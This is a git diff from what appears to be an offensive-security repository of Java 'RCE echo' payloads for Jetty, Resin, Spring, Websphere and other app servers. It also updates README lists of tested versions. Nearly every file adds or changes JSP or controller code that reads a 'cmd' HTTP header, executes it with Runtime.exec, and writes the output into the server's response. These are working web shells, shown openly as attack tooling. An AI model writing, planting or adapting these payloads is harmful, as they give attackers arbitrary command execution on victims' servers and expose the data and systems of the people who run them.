diff --git a/Jetty/code/jetty789Echo.jsp b/Jetty/code/jetty789Echo.jsp index 847e28e..4028bf4 100644 --- a/Jetty/code/jetty789Echo.jsp +++ b/Jetty/code/jetty789Echo.jsp @@ -24,14 +24,17 @@ obj = method.invoke(connection, null); method = obj.getClass().getMethod("getHeader", new Class[]{String.class}); - obj = method.invoke(obj, new Object[]{"cmd"}); + String cmd = (String)method.invoke(obj, new Object[]{"cmd"}); - String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next(); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class}); - java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"}); - printWriter.println(res); + method = connection.getClass().getMethod("getPrintWriter", new Class[]{String.class}); + java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, new Object[]{"utf-8"}); + printWriter.println(res); + } + break; }else if(obj != null && obj.getClass().getName().endsWith("HttpConnection")){ java.lang.reflect.Method method = obj.getClass().getDeclaredMethod("getHttpChannel", null); Object httpChannel = method.invoke(obj, null); @@ -40,16 +43,19 @@ obj = method.invoke(httpChannel, null); method = obj.getClass().getMethod("getHeader", new Class[]{String.class}); - obj = method.invoke(obj, new Object[]{"cmd"}); - - String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next(); - - method = httpChannel.getClass().getMethod("getResponse", null); - obj = method.invoke(httpChannel, null); - - method = obj.getClass().getMethod("getWriter", null); - java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null); - printWriter.println(res); + String cmd = (String)method.invoke(obj, new Object[]{"cmd"}); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + + method = httpChannel.getClass().getMethod("getResponse", null); + obj = method.invoke(httpChannel, null); + + method = obj.getClass().getMethod("getWriter", null); + java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj, null); + printWriter.println(res); + } + + break; } } %> \ No newline at end of file diff --git a/Jetty/code/jetty78Echo.jsp b/Jetty/code/jetty78Echo.jsp index 6165920..cda8dbd 100644 --- a/Jetty/code/jetty78Echo.jsp +++ b/Jetty/code/jetty78Echo.jsp @@ -22,13 +22,16 @@ obj = method.invoke(connection); method = obj.getClass().getMethod("getHeader", String.class); - obj = method.invoke(obj, "cmd"); + String cmd = (String)method.invoke(obj, "cmd"); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next(); + method = connection.getClass().getMethod("getPrintWriter", String.class); + java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8"); + printWriter.println(res); + } - method = connection.getClass().getMethod("getPrintWriter", String.class); - java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(connection, "utf-8"); - printWriter.println(res); + break; } } %> \ No newline at end of file diff --git a/Jetty/code/jetty9Echo.jsp b/Jetty/code/jetty9Echo.jsp index 67a0aff..9b5e807 100644 --- a/Jetty/code/jetty9Echo.jsp +++ b/Jetty/code/jetty9Echo.jsp @@ -24,16 +24,19 @@ obj = method.invoke(httpChannel); method = obj.getClass().getMethod("getHeader", String.class); - obj = method.invoke(obj, "cmd"); - - String res = new java.util.Scanner(Runtime.getRuntime().exec(obj.toString()).getInputStream()).useDelimiter("\\A").next(); - - method = httpChannel.getClass().getMethod("getResponse"); - obj = method.invoke(httpChannel); - - method = obj.getClass().getMethod("getWriter"); - java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj); - printWriter.println(res); + String cmd = (String)method.invoke(obj, "cmd"); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + + method = httpChannel.getClass().getMethod("getResponse"); + obj = method.invoke(httpChannel); + + method = obj.getClass().getMethod("getWriter"); + java.io.PrintWriter printWriter = (java.io.PrintWriter)method.invoke(obj); + printWriter.println(res); + } + + break; } } %> \ No newline at end of file diff --git a/README.md b/README.md index 364af69..6dc3acc 100644 --- a/README.md +++ b/README.md @@ -5,7 +5,8 @@ - [x] Windows通用回显 - [x] Spring回显 - [x] Tomcat通用回显 (Tested on 6.0.10/6.0.53/7.0.34/7.0.54/7.0.70/7.0.96/7.0.104/8.0.18/8.0.32/8.0.48/8.5.12/8.5.30/8.5.56/9.0.16/9.0.33, failed on 7.0.10/7.0.22) -- [x] Weblogic +- [x] Weblogic (Tested on 10.3.6.0, 12.1.3.0.0) +- [x] Websphere (Tested on AppServer V8.5(8.5.5.18), AppServer V9.0(9.0.5.5)) - [x] JBoss(Wildfly) (Testd on 8.0.0.Final, 18.0.0.Final, 21.0.0.Beta1) - [x] Resin (Tested on pro-4.0.64, pro-4.0.57, pro-4.0.45, pro-4.0.32, failed on pro-3.1.15) - [x] Jetty (Tested on 9.4.30.v20200611, 9.3.28.v20191105, 9.2.29.v20191105, 9.0.7.v20131107, 8.1.21.v20160908, 7.6.21.v20160908, diff --git a/Resin/code/resinEcho.jsp b/Resin/code/resinEcho.jsp index d9a6b19..da00953 100644 --- a/Resin/code/resinEcho.jsp +++ b/Resin/code/resinEcho.jsp @@ -1,6 +1,6 @@ <%@ page contentType="text/html;charset=UTF-8" language="java" %> <% - Class clazz = Thread.currentThread().getClass(); + Class clazz = Thread.currentThread().getClass(); java.lang.reflect.Field field = clazz.getSuperclass().getDeclaredField("threadLocals"); field.setAccessible(true); Object obj = field.get(Thread.currentThread()); @@ -21,14 +21,19 @@ if(obj != null && obj.getClass().getName().equals("com.caucho.server.http.HttpRequest")){ com.caucho.server.http.HttpRequest httpRequest = (com.caucho.server.http.HttpRequest)obj; String cmd = httpRequest.getHeader("cmd"); - String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse(); - httpResponse.setHeader("Content-Length", res.length() + ""); - java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null); - method.setAccessible(true); - com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null); - httpResponseStream.write(res.getBytes(), 0, res.length()); - httpResponseStream.close(); + + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + com.caucho.server.http.HttpResponse httpResponse = httpRequest.createResponse(); + httpResponse.setHeader("Content-Length", res.length() + ""); + java.lang.reflect.Method method = httpResponse.getClass().getDeclaredMethod("createResponseStream", null); + method.setAccessible(true); + com.caucho.server.http.HttpResponseStream httpResponseStream = (com.caucho.server.http.HttpResponseStream) method.invoke(httpResponse,null); + httpResponseStream.write(res.getBytes(), 0, res.length()); + httpResponseStream.close(); + } + + break; } } %> \ No newline at end of file diff --git a/Spring/code/SpringMVCTestController.java b/Spring/code/SpringMVCTestController.java index 7552318..cd936d0 100644 --- a/Spring/code/SpringMVCTestController.java +++ b/Spring/code/SpringMVCTestController.java @@ -19,8 +19,10 @@ public User Test() throws IOException { javax.servlet.http.HttpServletResponse httpresponse = ((org.springframework.web.context.request.ServletRequestAttributes) requestAttributes).getResponse(); String cmd = httprequest.getHeader("cmd"); - String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - httpresponse.getWriter().println(res); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + httpresponse.getWriter().println(res); + } return new User(); } diff --git a/Spring/code/SpringWebFlowTestController.java b/Spring/code/SpringWebFlowTestController.java index c6d73b9..82f13c6 100644 --- a/Spring/code/SpringWebFlowTestController.java +++ b/Spring/code/SpringWebFlowTestController.java @@ -26,8 +26,10 @@ public String test() throws IOException { javax.servlet.http.HttpServletResponse response = (javax.servlet.http.HttpServletResponse) servletExternalContext.getNativeResponse(); String cmd = request.getHeader("cmd"); - String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); - response.getWriter().println(res); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + response.getWriter().println(res); + } return "test"; } diff --git a/Websphere/README.md b/Websphere/README.md new file mode 100644 index 0000000..6cfeb58 --- /dev/null +++ b/Websphere/README.md @@ -0,0 +1,5 @@ +# Websphere 回显 + +## 效果 +![img](https://raw.githubusercontent.com/feihong-cs/Java-Rce-Echo/master/Websphere/img/001.png) + diff --git a/Websphere/code/websphereEcho.jsp b/Websphere/code/websphereEcho.jsp new file mode 100644 index 0000000..b507eb7 --- /dev/null +++ b/Websphere/code/websphereEcho.jsp @@ -0,0 +1,28 @@ +<%@ page contentType="text/html;charset=UTF-8" language="java" %> +<% + Class clazz = Thread.currentThread().getClass(); + java.lang.reflect.Field field = clazz.getDeclaredField("wsThreadLocals"); + field.setAccessible(true); + Object obj = field.get(Thread.currentThread()); + + Object[] obj_arr = (Object[]) obj; + for(int i = 0; i < obj_arr.length; i++){ + Object o = obj_arr[i]; + if(o == null) continue; + + if(o.getClass().getName().endsWith("WebContainerRequestState")){ + Object req = o.getClass().getMethod("getCurrentThreadsIExtendedRequest", new Class[0]).invoke(o, new Object[0]); + Object resp = o.getClass().getMethod("getCurrentThreadsIExtendedResponse", new Class[0]).invoke(o, new Object[0]); + + String cmd = (String) req.getClass().getMethod("getHeader", new Class[]{String.class}).invoke(req, new Object[]{"cmd"}); + if(cmd != null && !cmd.isEmpty()){ + String res = new java.util.Scanner(Runtime.getRuntime().exec(cmd).getInputStream()).useDelimiter("\\A").next(); + + java.io.PrintWriter printWriter = (java.io.PrintWriter)resp.getClass().getMethod("getWriter", new Class[0]).invoke(resp, new Object[0]); + printWriter.println(res); + } + + break; + } + } +%> diff --git a/Websphere/img/001.png b/Websphere/img/001.png new file mode 100644 index 0000000..e52c345 Binary files /dev/null and b/Websphere/img/001.png differ